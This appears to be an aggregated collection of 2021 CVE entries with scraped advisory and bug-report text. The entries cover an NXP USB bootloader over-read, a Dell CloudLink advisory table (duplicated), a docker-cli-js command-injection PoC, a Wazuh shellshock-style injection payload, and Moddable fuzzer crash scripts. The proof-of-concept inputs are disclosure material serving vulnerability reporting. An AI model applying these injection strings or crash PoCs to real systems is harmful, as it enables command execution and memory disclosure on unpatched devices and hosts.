NXP Kinetis K82 devices have a buffer over-read via a crafted wlength value in a GET Status-Other request during use of USB In-System Programming (ISP) mode. This discloses protected flash memory.

**CVE-2021-40154****LPC55S69 and K82 USB In-System Programming (ISP) Buffer Over Read Vulnerabilities**

POC to test the BootROM vulnerability found in LPC55S69 and K82 Series Revision A2. The vulnerability is fixed in newer devices with newe Revision A3 for LPC55S69.

**Vulnerable Devices:**

**Confirmed:** LPC55S69 and K82 series MCU’s

**Suspected:** other NXP series MCU’s with similar USB ISP stack - Kinetis K Series and RT Series

**Vulnerability Summary:**

A Buffer over read vulnerability was observed in the USB In-system programming (ISP) mode of NXP LPC55s69 and Kinetis K82 Microcontroller series. When exploited, the vulnerability allows an attacker to read 16KB (LPC55S69) and 64KB (K82) of data from protected flash memory.

**Technical Details:**

NXP LPC55S69 and K82 MCUs provide In-System Programming (ISP) modes for field update of the MCU’s firmware using peripherals such as USB, SPI, UART, and I2C. The USP ISP mode provides an embedded host to update firmware through NXP’s documented update commands.

The ISP is part of the LPC55S69 and K82 BootROM, and gets triggered depending on the values of certain register bits, ISP pin, and image header definition. For LPC55S69, the USB HID class is used to download an image of the USB0/1 port and, similarly, for K82 the Kinetis Bootloader in the ROM supports loading data into flash via the USB peripheral as a USB HID class.

Both the LPC55S69 and K82 series IC’s USB ISP use three (3) endpoints, which are listed below:

*   Control (0)
*   Interrupt IN (1)
*   Interrupt OUT (2)

The buffer over read vulnerability was observed for the USB Control endpoint 0, which is used for USB host enumeration.

**Proof of Concept**

**Target 1: LPC55S69**

The buffer over read vulnerability is observed at the GET Descriptor Configuration request from the embedded USB host. An attacker can request up to 16KB of response data, when crafting an USB request to send GET Descriptor Configuration, by modifying the “wlength” value to 65535 bytes. LPC556S9 limits, and resets, when 16KB of data is copied to the USB TX buffer and successfully transmits to the host.

**Device Details:**

Target Dev Board: LPC55S69 – EVK RevA2 USB Host: Ubuntu 20.04 or Raspberry-pi 4 Model B

**Steps to reproduce the vulnerability:**

1.  In LPC55S69 – EVK RevA2 Development board the USB ISP is triggered by pressing the ISP button and reset button.
2.  Connect the USB 1 High speed port to an Ubuntu Laptop or Raspberry-pi.
3.  The LPC board gets detected as USB Composite device as documented by Figure 1.

Figure 1: Ubuntu dmesg utility showing USB device details

    [43295.318228] usb 1-1.4: USB disconnect, device number 95
    [43296.175536] usb 1-1.4: new full-speed USB device number 96 using xhci_hcd
    [43296.397315] usb 1-1.4: New USB device found, idVendor=1fc9, idProduct=0021, bcdDevice= 3.00
    [43296.397331] usb 1-1.4: New USB device strings: Mfr=1, Product=2, SerialNumber=0
    [43296.397337] usb 1-1.4: Product: USB COMPOSITE DEVICE
    [43296.397342] usb 1-1.4: Manufacturer: NXP SEMICONDUCTOR INC.
    [43296.400768] hid-generic 0003:1FC9:0021.0055: hiddev0,hidraw4: USB HID v1.00 Device [NXP SEMICONDUCTOR INC. USB COMPOSITE DEVICE] on usb-0000:00:14.0-1.4/input0
    

4.  Connect an USB analyser in between the target board and PC, or use the Linux kernel module “usbmon” to capture USB packets:

*   If using USBmon in Ubuntu, run this command “sudo modprobe usbmon”.
*   While using “lsusb”, note the bus and device address.
*   Run “sudo wireshark”, connect to the USBMON1/2 interface with reference to the bus number from “lsusb”.

5.  In Wireshark, filter the USB device address with reference to the bus number from “lsusb”.
6.  Run the Proof of Concept (PoC) “sudo python3 LPC\_USB.py” in Ubuntu. In order to successfully execute Python script, below requirements are needed in the USB host PC: a. Install Python 3+ b. Install the “pyusb” module

7.  Verify the buffer overflow by checking the request and response from the USB traces, as documented by Figure 2; Figure 3 shows, instead, the USB analyser trace. The USB response would be 4KB.

![Figure 2](https://github.com/Xen1thLabs-AE/CVE-2021-40154/raw/main/wireshark.png)

![Figure 3](https://github.com/Xen1thLabs-AE/CVE-2021-40154/raw/main/usb_trace.png)

**Note 1:** The buffer over read of 4KB can be requested in Ubuntu system due to the restriction of Libusb “MAX\_CTRL\_BUFFER\_LENGTH”. This can be modified in a Raspberry-pi system and 16KB can be requested. Attached firmware “LPC.bin” retrieved from the LPC55s69-EVK board using a raspberry-pi 4 model b.

If you would like to issue requests greater than 4KB, use this awesome script created by Horac on a Raspi and run the POC with wlength changed to 65535(0xffff).

**Target 2: Kinetis K82**

The buffer over read vulnerability is observed at the GET Status-Other request from an embedded USB host. An attacker can request up to 64KB of response data, when crafting an USB request to send GET status-Other, by modifying the “wlength” value to 65535 bytes. The K82 USB device successfully sends 64KB of data.

**Device Details:**

Target Dev Board: FRDM-K82F USB Host: Ubuntu Laptop or Raspberry-pi

**Note 1:** The buffer over read of 4KB can be requested in Ubuntu system due to the restriction of Libusb “MAX\_CTRL\_BUFFER\_LENGTH”. This can be modified in a Raspberry-pi and 64KB can be requested.

**Note 2:** the vulnerability in K82 is reproduced only when the USB requests for GET status-Device, Interface, Endpoint, and other has to happen subsequently in order to trigger the vulnerability. This can be achieved by running the developed PoC scripts after multiple ISP resets.

If you would like to issue requests greater than 4KB, use this awesome script created by Horac on a Raspi and run the POC with wlength changed to 65535(0xffff).

CVE-2021-44479: GitHub - Xen1thLabs-AE/CVE-2021-40154: POC to test the BootROM vulnerability found in LPC55S69 and K82 Series

ARK library allows attackers to execute remote code via the parameter(path value) of Ark_NormalizeAndDupPAthNameW function because of an integer overflow.

**Security Advisory**

 

CVE-2021-26615 | bandisoft ARK Library integer overflow vulnerability2021.11.25

□ Overview  
o bandisoft Co.,Ltd released security update to address integer overflow vulnerability in ARK library.(decompression module)

Vulnerability Type

Impact

Severity

CVSS Score

CVE ID

integer overflow

remote code execution

High

7.8

CVE-2021-26615

   
□ Description  
o ARK library allows attackers to execute remote code via the parameter(path value) of Ark\_NormalizeAndDupPAthNameW function  
because of an integer overflow.

  □ Affected Product

Product

Version

Platform

ARK library

7.13.0.3

Linux Ubuntu

  
□ Solution  
o Update software over 7.16.0.1 version or higher.

□ Reference  
\[1\] https://kr.bandisoft.com/ark/

  □ Acknowledgements  
o Thanks to Jae Young Jeong for reporting this vulnerability

□ 작성 : 침해사고분석단 취약점분석팀

트위터 페이스북

CVE-2021-26615: KISA 인터넷 보호나라&KrCERT

Buffer Overflow vulnerability in tvnviewer.exe of TightVNC Viewer allows a remote attacker to execute arbitrary instructions via a crafted FramebufferUpdate packet from a VNC server.

CVE-2021-42785: TightVNC: What's New in TightVNC

Dell EMC CloudLink 7.1 and all prior versions contain a HTML and Javascript Injection Vulnerability. A remote low privileged attacker, may potentially exploit this vulnerability, directing end user to arbitrary and potentially malicious websites.

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-36312

Dell EMC CloudLink 7.1 and all prior versions contain a Hard-coded Password Vulnerability. A remote high privileged attacker, with the knowledge of the hard-coded credentials, may potentially exploit this vulnerability to gain unauthorized access to the system. 

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2021-36313

Dell EMC CloudLink 7.1 and all prior versions contain an OS command injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.   
This vulnerability is considered critical as it may be leveraged to completely compromise the vulnerable application as well as the underlying operating system. Dell recommends customers to upgrade at the earliest opportunity.

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2021-36314

Dell EMC CloudLink 7.1 and all prior versions contain an Arbitrary File Creation Vulnerability. A remote unauthenticated attacker, may potentially exploit this vulnerability, leading to the execution of arbitrary files on the end user system. 

7.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

CVE-2021-36332

Dell EMC CloudLink 7.1 and all prior versions contain a HTML and Javascript Injection Vulnerability. A remote low privileged attacker, may potentially exploit this vulnerability, directing end user to arbitrary and potentially malicious websites. 

5.4

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVE-2021-36333

Dell EMC CloudLink 7.1 and all prior versions contain a Buffer Overflow Vulnerability. A local low privileged attacker, may potentially exploit this vulnerability, leading to an application crash. 

5.5

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2021-36334

Dell EMC CloudLink 7.1 and all prior versions contain a CSV formula Injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to arbitrary code execution on end user machine

5.9

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

CVE-2021-36335

Dell EMC CloudLink 7.1 and all prior versions contain an Improper Input Validation Vulnerability. A remote low privileged attacker, may potentially exploit this vulnerability, leading to execution of arbitrary files on the server

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

 

**Third-party Component** 

**CVEs**

**More information**

Ubuntu 16.04 LTS: libxml2 vulnerabilities  (USN-4991-1)

CVE-2021-3516

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2017-8872

CVE-2020-24977

CVE-2021-3541

CVE-2021-3537

CVE-2021-3517

CVE-2021-3518

CVE-2019-20388

Ubuntu 16.04 LTS: LZ4 vulnerability (USN-4968-2)

CVE-2021-3520

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS: Intel Microcode vulnerabilities (USN-4985-1)

CVE-2020-24512

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-24513

CVE-2020-24511

CVE-2020-24489

Ubuntu 16.04 LTS: libx11 vulnerability (USN-4966-2)

CVE-2021-31535

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS: libx11 vulnerability (USN-4966-2)

CVE-2021-31535

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS: GNU C Library vulnerabilities (USN-4954-1)

CVE-2009-5155

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-6096

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 / 21.04: Bind vulnerabilities (USN-4929-1)

CVE-2021-25215

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-25214

CVE-2021-25216

Ubuntu 16.04 LTS / 18.04 LTS: Linux kernel vulnerabilities (USN-4916-1)

CVE-2021-3493

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-29154

Ubuntu 16.04 LTS: Linux kernel vulnerabilities (USN-4904-1)

CVE-2017-16644

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2019-16231

CVE-2021-26930

CVE-2021-28038

CVE-2019-19061

CVE-2021-26931

CVE-2017-5967

CVE-2015-1350

CVE-2019-16232

CVE-2021-20261

CVE-2018-13095

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10: Nettle vulnerability (USN-4906-1)

CVE-2021-20305

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10: curl vulnerabilities (USN-4898-1)

CVE-2021-22890

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-22876

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10: Bind vulnerability (USN-4737-1)

CVE-2020-8625

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

mbedtls

CVE-2018-0497

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-36312

Dell EMC CloudLink 7.1 and all prior versions contain a Hard-coded Password Vulnerability. A remote high privileged attacker, with the knowledge of the hard-coded credentials, may potentially exploit this vulnerability to gain unauthorized access to the system. 

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2021-36313

Dell EMC CloudLink 7.1 and all prior versions contain an OS command injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.   
This vulnerability is considered critical as it may be leveraged to completely compromise the vulnerable application as well as the underlying operating system. Dell recommends customers to upgrade at the earliest opportunity.

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2021-36314

Dell EMC CloudLink 7.1 and all prior versions contain an Arbitrary File Creation Vulnerability. A remote unauthenticated attacker, may potentially exploit this vulnerability, leading to the execution of arbitrary files on the end user system. 

7.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

CVE-2021-36332

Dell EMC CloudLink 7.1 and all prior versions contain a HTML and Javascript Injection Vulnerability. A remote low privileged attacker, may potentially exploit this vulnerability, directing end user to arbitrary and potentially malicious websites. 

5.4

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVE-2021-36333

Dell EMC CloudLink 7.1 and all prior versions contain a Buffer Overflow Vulnerability. A local low privileged attacker, may potentially exploit this vulnerability, leading to an application crash. 

5.5

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2021-36334

Dell EMC CloudLink 7.1 and all prior versions contain a CSV formula Injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to arbitrary code execution on end user machine

5.9

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

CVE-2021-36335

Dell EMC CloudLink 7.1 and all prior versions contain an Improper Input Validation Vulnerability. A remote low privileged attacker, may potentially exploit this vulnerability, leading to execution of arbitrary files on the server

4.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

 

**Third-party Component** 

**CVEs**

**More information**

Ubuntu 16.04 LTS: libxml2 vulnerabilities  (USN-4991-1)

CVE-2021-3516

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2017-8872

CVE-2020-24977

CVE-2021-3541

CVE-2021-3537

CVE-2021-3517

CVE-2021-3518

CVE-2019-20388

Ubuntu 16.04 LTS: LZ4 vulnerability (USN-4968-2)

CVE-2021-3520

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS: Intel Microcode vulnerabilities (USN-4985-1)

CVE-2020-24512

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-24513

CVE-2020-24511

CVE-2020-24489

Ubuntu 16.04 LTS: libx11 vulnerability (USN-4966-2)

CVE-2021-31535

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS: libx11 vulnerability (USN-4966-2)

CVE-2021-31535

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS: GNU C Library vulnerabilities (USN-4954-1)

CVE-2009-5155

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-6096

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 / 21.04: Bind vulnerabilities (USN-4929-1)

CVE-2021-25215

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-25214

CVE-2021-25216

Ubuntu 16.04 LTS / 18.04 LTS: Linux kernel vulnerabilities (USN-4916-1)

CVE-2021-3493

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-29154

Ubuntu 16.04 LTS: Linux kernel vulnerabilities (USN-4904-1)

CVE-2017-16644

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2019-16231

CVE-2021-26930

CVE-2021-28038

CVE-2019-19061

CVE-2021-26931

CVE-2017-5967

CVE-2015-1350

CVE-2019-16232

CVE-2021-20261

CVE-2018-13095

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10: Nettle vulnerability (USN-4906-1)

CVE-2021-20305

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10: curl vulnerabilities (USN-4898-1)

CVE-2021-22890

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-22876

Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10: Bind vulnerability (USN-4737-1)

CVE-2020-8625

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

mbedtls

CVE-2018-0497

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen****Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2021-11-01

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

CVE-2021-36332: DSA-2021-194: Dell EMC CloudLink Security Update for Multiple Security Vulnerabilities

This affects all versions of package docker-cli-js.
 If the command parameter of the Docker.command method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system.



**How to fix?**

There is no fixed version for `docker-cli-js`.

**Overview**

Affected versions of this package are vulnerable to Arbitrary Code Execution. If the `command` parameter of the `Docker.command` method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system.

##PoC

1.  Create a file named `exploit.js` with the following content:

    var dockerCLI = require('docker-cli-js');
    var DockerOptions = dockerCLI.Options;
    var Docker = dockerCLI.Docker;
    
    var docker = new Docker();
    
    var userInput = "echo 'Hello from the container'"; echo 'Hello from the host' #";
    
    docker.command(`exec container-test bash -c "${userInput}"`, function (err, data) {
    console.log('data = ', data);
    });
    

2.  In the same directory as `exploit.js`, run `npm install docker-cli-js`.
3.  Create a background Docker container named `container-test`: `docker run': docker run --name container-test -d ubuntu sleep 1000`.
4.  Run `exploit.js`: `node exploit.js`.

You should see the outputs of both the container and host system.

CVE-2021-23732: Arbitrary Code Execution in docker-cli-js | Snyk

ius_get.cgi in IpTime C200 camera allows remote code execution. A remote attacker may send a crafted parameters to the exposed vulnerable web service interface which invokes the arbitrary shell command.

**Security Advisory**

 

CVE-2021-26614 | IpTime C200 IP camera remote code execution vulnerability2021.11.15

□ Overview  
 o EFMNetworks Co.,Ltd released security update to address remote code execution vulnerability in IpTime C200 camara.

Vulnerability Type

Impact

Severity

CVSS Score

CVE ID

Exposed dangerous method   
or function

remote code execution

High

7.5

CVE-2021-26614

  
□ Description  
 o ius\_get.cgi in IpTime C200 camera allows remote code execution. A remote attacker may send a crafted parameters to the exposed vulnerable web service interface which invokes the arbitrary shell command.

□ Affected Product

Product

Version

Platform

IpTime C200 Camera

1.058 or prior

Ubuntu 20.04

□ Solution  
 o Update firmware over IpTime C200 Camera 1.060 version or higher.

□ Reference  
 \[1\] http://iptime.com/iptime/?page\_id=126&pageid=1&mod=&keyword=C200&uid=24015

□ Acknowledgements  
 \[1\] Thanks to Inhyeong Yi and Jaehyeong Yi for reporting this vulnerability.

□ 작성 : 침해사고분석단 취약점분석팀

트위터 페이스북

CVE-2021-26614: KISA 인터넷 보호나라&KrCERT

In the wazuh-slack active response script in Wazuh before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution.

Wazuh version

Component

Install type

Install method

Platform

Fix

4.2.0

Active-response script

Manager/Agent

Packages

CentOS 7

#10809

This issue was reported by @rk700.

We found a command injection bug in the active-response script wazuh-slack.

The alert json data is put in the shell command line as POST body for `curl`:

snprintf(system\_command, OS\_MAXSTR -1, "curl -H \\"Accept: application/json\\" -H \\"Content-Type: application/json\\" -d '%s' %s", output\_str, site\_url);

However, the raw log line which could be partially controlled by an attacker is also included in the JSON data. Single quote in JSON is not escaped and therefore could be used to truncate the command:

    -d '<json data that could be partially controlled>'
    

Steps to reproduce are as follows.

First, we add the `wazuh-slack` active-response in the config:

  <command\>
    <name\>wazuh-slack</name\>
    <executable\>wazuh-slack</executable\>
    
    <extra\_args\>http://192.168.1.95:8080/test</extra\_args\>
  </command\>

  <active-response\>
    <disabled\>no</disabled\>
    <command\>wazuh-slack</command\>
    <location\>server</location\>
    <level\>6</level\>
  </active-response\>

Then we setup a web server on the client machine, and send request with crafted User-Agent:

curl -I 192.168.1.96/1.html -A "() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '"

The shellshock PoC will trigger an alert, and the crafted User-Agent value which is contained in web server access.log would also be included in the command line as follows:

curl -H "Accept: application/json" -H "Content-Type: application/json" -d '{"attachments":\[{"color
":"danger","pretext":"WAZUH Alert","title":"Shellshock attack detected","text":"192.168.1.96 - - \[04/Nov/2021:12:53:56 +0800\] \\"GET /1.html HTTP/1.1\\" 200 5
 \\"-\\" \\"() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '\\"","fields":\[{"title":"Agent","value":"(001) - hids\_client"},{"title":"Location","value":"/var/
log/apache2/access.log"},{"title":"Rule ID","value":"31168 (level 15)"}\],"ts":"1636001638.913845"}\]}' http://192.168.1.95:8080/test

Here we use the single quote to jump out of `-d '<json data>'` and inject the command `touch /tmp/injection` with semicolons. We can verify that on the server where the `wazuh-slack` is running(the wazuh-manager machine in this case since we set the location as `server` in the active-response config):

    root@ubuntu:~# ls -l /tmp/injection
    -rw-r--r-- 1 root ossec 0 Nov  4 17:19 /tmp/injection
    

Special thanks to @rk700 for detecting and reporting this issue to the team.

CVE-2021-44079: Active response tools allow arbitrary code execution · Issue #10858 · wazuh/wazuh

OpenSource Moddable v10.5.0 was discovered to contain a stack overflow in the fxBinaryExpressionNodeDistribute function at /moddable/xs/sources/xsTree.c.

CVE-2021-29329: stack-overflow(fxBinaryExpressionNodeDistribute) · Issue #587 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c.

    operating system: ubuntu18.04
    compile command:  cd /pathto/moddable/xs/makefiles/lin
    make
    test command: ./xst poc
    

    function getHiddenValue() {
        var obj = {};
        var nEmw = new RegExp(null);
        var oob = 'value';
        var fun = eval(str);
        nEmw = new Object();
        oob = Object.assign('0', Object(521));
        var str = 'new String(\'\')';
        var fun = eval(str);
        let protoWithIndexedAccessors = {};
        var j = [];
        Object.assign(obj, fun);
        var fun = eval(str);
        return obj;
    }
    function makeOobString() {
        var hiddenValue = getHiddenValue();
        var str = 'constructor';
        var extern_arr_vars = [];
        let i = 0;
        var ijjkkk = 0;
        str = ijjkkk < 100000;
        function helper(i) {
            let a = new Array();
            var extern_arr_vars = [];
            if (ijjkkk < 100000) {
                makeOobString(a, protoWithIndexedAccessors);
            }
            return a;
            var oobString = makeOobString();
        }
        var j = [];
        var fun = eval(str);
        Object(fun, hiddenValue);
        var oobString = helper();
        for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
            fun = makeOobString();
        }
        return oobString;
    }
    var oobString = makeOobString();
    var oobString = makeOobString();
    helper(oobString);
    let protoWithIndexedAccessors = {};
    

    ASAN:SIGSEGV
    =================================================================
    ==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
        #0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
        #1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
        #2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
        #3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
        #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
        #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
        #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
        #7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
    ==5974==ABORTING

CVE-2021-29328: over access(fxEnvironmentGetProperty) · Issue #585 · Moddable-OpenSource/moddable

OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fx_ArrayBuffer function at /moddable/xs/sources/xsDataView.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**heap-buffer-overflow(fx\_ArrayBuffer) #580**

Closed

rain6851 opened this issue

Feb 26, 2021

· 0 comments

**Comments**

![@rain6851](https://avatars.githubusercontent.com/u/13704697?s=88&v=4)

**Enviroment**

    operating system: ubuntu18.04
    compile command:  cd /pathto/moddable/xs/makefiles/lin
    make
    test command: ./xst poc
    

**poc:**

    function gc() {
        for (let i = 0; i < 500; i++) {
            let ab = new ArrayBuffer(1518500249 | 1073741823);
        }
    }
    function opt(obj) {
        for (let i = 0; yjwa; i++) {
        }
        let tmp = { a: 1 };
        gc();
        tmp.__proto__ = {};
        var hedB = escape(null);
        for (let k in tmp) {
            tmp.__proto__ = {};
            gc();
            obj.__proto__ = {};
            var yjwa = i < 500;
            return obj[k];
        }
    }
    opt({});
    var CPzS = fake_object_memory[0];
    let fake_object_memory = new Uint32Array(100);
    fake_object_memory[0] = 4660;
    let fake_object = opt(fake_object_memory);
    opt(9007199254740990);
    print(fake_object);
    

**description**

    =================================================================
    ==5914==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f603a9fe820 at pc 0x7f603de4ebec bp 0x7ffc75e18740 sp 0x7ffc75e17ee8
    WRITE of size 2147483647 at 0x7f603a9fe820 thread T0
        #0 0x7f603de4ebeb in __asan_memset (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8cbeb)
        #1 0x49c99e in fx_ArrayBuffer /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDataView.c:431
        #2 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
        #3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
        #4 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
        #5 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
        #6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #7 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
    
    0x7f603a9fe820 is located 0 bytes to the right of 16777248-byte region [0x7f60399fe800,0x7f603a9fe820)
    allocated by thread T0 here:
        #0 0x7f603de5a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
        #1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122
        #2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377
        #3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159
        #4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305
        #5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
        #6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memset
    Shadow bytes around the buggy address:
